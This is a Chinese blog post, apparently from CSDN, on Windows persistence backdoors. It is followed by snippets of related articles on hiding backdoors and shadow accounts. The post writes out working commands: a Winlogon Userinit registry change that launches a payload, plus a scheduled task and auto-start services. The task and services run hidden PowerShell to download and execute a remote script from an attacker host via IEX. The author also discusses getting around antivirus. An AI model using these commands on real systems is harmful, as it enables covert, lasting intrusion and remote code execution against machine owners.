Windows权限维持---后门

Windows权限维持的后门实现方法
原创 已于 2025-08-07 13:26:15 修改 · 350 阅读 · 4 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#windows

于 2025-08-07 13:24:22 首次发布

目录

1 注册表自启动

1.1 生成payload

1.2 查看是否上线

2 生成powershell的脚本

2.1 监听9999

2.2 查看是否上线

3 组策略设置脚本启动

4 计划任务

5 服务自启动

1 注册表自启动

1.1 生成payload

reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v Userinit /t REG_SZ /d "C:\windows\system32\userinit.exe;C:\Users\Public\payload.exe" /f

1.2 查看是否上线

2 生成powershell的脚本

2.1 监听9999

2.2 查看是否上线

3 组策略设置脚本启动

运行gpedit.msc进入本地组策略,通过Windows设置的“脚本(启动/关机)”项来说实现。因为其极具隐蔽性,因此常常被攻击者利用来做服务器后门。

容易遇到的问题:脚本需全路径,如C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

将生成的payload上传到服务器:

注意修改名字,开始没修改迟迟不上线

这边设置的监听服务器能接收到200ok,但是我每次重启在cs上都不能上线,所以我直接先关实时保护,在本地powershell进行测试:

可以看到应该是已经执行了的,但是没有免杀,所以重启一直会被杀

4 计划任务

schtasks /create /sc minute /mo 1 /tn "Security Sprint" /tr "powershell.exe -nop -w hidden -c 'IEX ((New-Object Net.WebClient).DownloadString(\"http://192.168.37.136:8888/logo.gif\"))'"

大概一分钟执行一次这个任务脚本,查看上线情况:

5 服务自启动

通过服务设置自启动,结合powershell实现无文件后门。

使用以下命令可实现:

sc create "KeyName" binpath= "cmd /c start powershell.exe -nop -w hidden -c \"IEX ((new-object net.webclient).downloadstring('http://192.168.37.136:8888/logo.gif'))\""
​
sc description  KeyName "Just For Test"   //设置服务的描述字符串
sc config Name start= auto                //设置这个服务为自动启动
net start Name                            //启动服务

成功创建了一个自启动服务

以管理员的形式运行cmd窗口,执行:

sc create "xfy666" binpath= "cmd /c start powershell.exe -nop -w hidden -c \"IEX ((new-object net.webclient).downloadstring('http://192.168.37.136:5555/logo.gif'))\""

关机重启看是否程序上线:还是跟之前一样因为没做免杀,所以无法自启动,我们关了实时保护,手动启动看是否上线

手动启动服务上线!

应急响应:Windows权限维持--后门
鹿鸣天涯
06-22 973
利用COM劫持技术,最为关键的是dll的实现以及CLSID的选择,通过修改CLSID下的注册表键值,实现对CAccPropServicesClass和MMDeviceEnumerator劫持,而系统很多正常程序启动时需要调用这两个实例。如果攻击者能够控制其中的某一 个目录,并且放一个恶意的DLL文件到这个目录下,这个恶意的DLL便会被进程所加载,从而造成代码执行。管理员在平时运维过程应当保持警惕,掌握一定的入侵排查技巧,及时进行系统补丁更新,定期对服务器安全检查,才能有效地预防后门
Windows 权限维持-后门隐藏
m0_63437176的博客
06-25 1047
交流使用,请勿做非法用途攻击者在获取服务器权限后,通常会用一些后门维持权限,如果你想让你的后门保持的更久些,那么请隐藏好它,使之不易被管理员发现。
玄机靶场 - 权限维持-linux权限维持-隐藏
zst6720的博客
05-14 552
ssh root@env.xj.edisec.net -p 密码 xjqxwcyc1.黑客隐藏的隐藏的文件 完整路径md52.黑客隐藏的文件反弹shell的ip+端口 {ip:port}3.黑客提权所用的命令 完整路径的md5 flag{md5}4.黑客尝试注入恶意代码的工具完整路径md55.使用命令运行 ./x.xx 执行该文件 将查询的 Exec****** 值 作为flag提交 flag{/xxx/xxx/xxx}
权限维持--基于Windows系统
weixin_53139502的博客
06-26 596
windows的粘滞键是:C:\windows\system32\sethc.exe的程序,它本是为不方便按组合键的人设计的,windows系统按5下shift后,windows就执行了system32下的sethc.exe,也就是启用了粘滞键。查看此程序的运行权限发现是当前用户但是当我们未登录系统(停留在登录界面)的时候,系统还不知道我们将以哪个用户登录,所以这个时候连续按5次shift后的话系统将会以system用户(具有管理员级别的权限)来运行sethc.exe这个程序。
Linux权限维持--隐藏篇
尘玥的故事
07-14 1027
这篇文章介绍了Linux系统下多种权限维持与隐藏技术,主要包括: 隐藏文件 - 通过文件名前加点或利用默认隐藏目录(如/tmp/.ICE-unix/)藏匿文件 修改时间戳 - 使用touch -r同步文件时间或touch -t自定义时间 文件锁定 - 通过chattr +i设置不可删除属性 历史记录删除 - 临时禁用历史记录或删除特定命令记录 SSH隐身登录 - 使用参数避免记录公钥或隐藏登录会话 端口复用 - 通过SSLH或iptables规则实现端口共享 进程隐藏 - 利用libprocesshider
Windows权限维持-Windows服务
qq_45434762的博客
08-08 496
在获取到目标主机的权限后,一般需要使用一些后门技术对主机的权限进行维持,以保持我们对目标主机的长期控制在获取到目标主机的权限后,一般需要使用一些后门技术对主机的权限进行维持,以保持我们...
windows内网渗透--权限维持
weixin_47099592的博客
07-03 1028
scr 文件实际上是一个可执行文件,类似于 .exe 文件。它们可以包含相同的代码,并且可以执行相同的任务。注释掉#source /etc/network/interfaces.d/*这个见我上一篇文章,这个还有个思路就是劫持后可以写一个添加管理员用户。将Administrator账户所复制的值,粘贴到hack。成功实现最基础的windows run注册表持久化。攻击机 kali 192.168.1.100。复制Administrator 中的F键值。接下来我们实现最简单的windows持久化。
权限维持---Windows权限维持--隐藏篇
永不垂头的博客
04-29 1529
权限维持篇—Windows权限维持–隐藏篇 文章目录权限维持---Windows权限维持--隐藏篇前言一、隐藏文件二、隐藏账号三、端口复用四、进程注入五、结束六、我的公众号 前言 攻击者在获取服务器权限后,通常会用一些后门维持权限,如果你想让你的后门保持的更久些,那么请隐藏好它,使之不易被管理员发现。 一、隐藏文件 1、利用文件属性最简单的一种隐藏文件的方式,文件右键属性,勾选隐藏,点击确定后,在这个文件里看不到刚刚的文件了。 如果要让文件显示出来,就点击查看,勾选显示隐藏的文件,文件就显示出来。
应急响应之Windows权限维持--后门
明哥哥知识分享
01-04 882
在获取服务器权限后,通常会用一些后门技术来维持服务器权限,服务器一旦被植入后门,攻击者便如入无人之境。本文将对常见的window服务端自启动后门技术进行解析,知己知彼方能杜绝后门。 1、 注册表自启动 通过修改注册表自启动键值,添加一个木马程序路径,实现开机自启动。 常用的注册表启动键: # Run键 HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\W
应急响应:Windows权限维持--隐藏篇
鹿鸣天涯
06-22 630
攻击者在获取服务器权限后,通常会用一些后门维持权限,如果你想让你的后门保持的更久些,那么请隐藏好它,使之不易被管理员发现。
[权限维持] Windows 权限维持 —— 影子账户后门 - 克隆账户
Blue17 の 小窝
02-28 1129
问题描述  分别在Windows和Linux操作系统上安装Metasploit软件,并运行Metasploit完成针对Linux靶机usermap_script漏洞的渗透攻击,尝试使用植入VNC图形化远程控制工具的攻击载荷,成功获得Linux靶机上的远程控制桌面。做权限维持的前提是你已经拿到了靶机的一个权限(一般还是高权限,不然部分后门你还没有权限写入),所以我们得先用攻击机生成一个木马文件,上传靶机后运行,先拿到靶机的一个权限。这部分我们站在防守者视角,来排查下高级款的影子账户后门
java基础-集合进阶
qq_33631393的博客
11-29 692
/如果往set集合中添加数据,如果当前添加的数据不存在,方法返回true,如果添加的数据存在了,方法返回false(set系统不允许重复)//remove(int index):删除指定索引删除元素,返回被删除的元素,删除后,原索引之后的元素依次想前移动。//返回值也是返回一个布尔类型的值,如果查询的值包含在集合里面,就返回true,如果不包含就返回false。//答案是:索引1,因为在调用方法的时候,如果方法出现了重载,优先调用,实参和形参类型一致的那个方法。
So-arm 101机械臂训练搭建全流程
weixin_44020969的博客
12-02 184
因旧物理机设备太差,现将训练一半的数据、程序等迁移至新设备继续训练。
LinkedList 源码深度分析(基于 JDK 8)
qq_29515513的博客
11-29 994
本文深入分析了JDK8中LinkedList的源码实现。LinkedList基于双向链表结构,同时实现了List和Deque接口,兼具列表和双端队列特性。文章详细剖析了其核心设计:1)类结构与Node内部类实现;2)构造方法与元素增删改查的核心操作;3)Deque接口实现的双端队列特性;4)支持双向迭代的ListIterator实现;5)克隆与序列化机制。重点阐述了链表节点操作的高效实现,包括link/unlink系列方法,以及通过二分查找优化节点定位的node方法。最后对比了LinkedList与Arra
winlogon源代码分析之winlogon!notifylist中Winlogon\\Notify\\sclgntfy节点的由来
linux-0.11调试教程
11-29 393
winlogon源代码分析之winlogon!notifylist中Winlogon\\Notify\\sclgntfy节点的由来
Java List集合
Halo_tjn的博客
11-29 952
新增 tryAdd(E e, long timeout, TimeUnit unit) 方法,支持带超时的尝试添加操作,多线程竞争时可避免无限阻塞(例: vector.tryAdd("元素", 1, TimeUnit.SECONDS) 尝试添加,1 秒超时则返回 false )。优化 首尾元素操作: addFirst(E e) 、 addLast(E e) 、 removeFirst() 、 removeLast() 方法底层逻辑简化,在高频首尾操作场景(如队列实现)中,效率提升约 30%。
深入理解IAsyncEnumerable:.NET中的异步迭代利器
最新发布
dotnethello的博客
12-02 737
在.NET开发中,处理大量数据或进行异步操作时,传统的同步迭代方式可能会导致性能瓶颈和响应迟缓。应运而生,它允许我们以异步的方式进行迭代操作,提高应用程序的响应性和性能,特别适用于处理网络请求、数据库查询等可能耗费大量时间的异步场景。
winlogon源代码分析之win32k!xxxScanSysQueue函数对Tab键的处理时KEY_UP的情况两次对qwnd进行了赋值
linux-0.11调试教程
12-02 152
winlogon源代码分析之win32k!xxxScanSysQueue函数对Tab键的处理时KEY_UP的情况两次对qwnd进行了赋值
22、双向链表作业实现与GDB调试实战
weixin_46607526的博客
12-02 606
本文介绍了双向链表作业的实现与GDB调试实战。作业部分包括双向链表的销毁(解决内存泄露)、逆序操作(原地逆序)以及单向链表特殊节点查找(使用快慢指针法)。GDB调试部分提供了常用命令速查表,并详细讲解了逻辑错误和段错误的调试步骤,包括设置断点、单步执行、查看变量等核心操作。通过代码示例和调试技巧,帮助开发者高效定位和解决链表操作中的各类问题。
Windows权限维持技术解析
"“一千零一种”权限维持方法.pdf - 关注Windows权限维持,包括理解、常用方法和安全相关的知识点" 本文档主要讲述了在网络安全领域如何维持对目标系统的长期控制,特别是针对Windows操作系统的权限维持技术。权限...
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

fatsheep洋

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值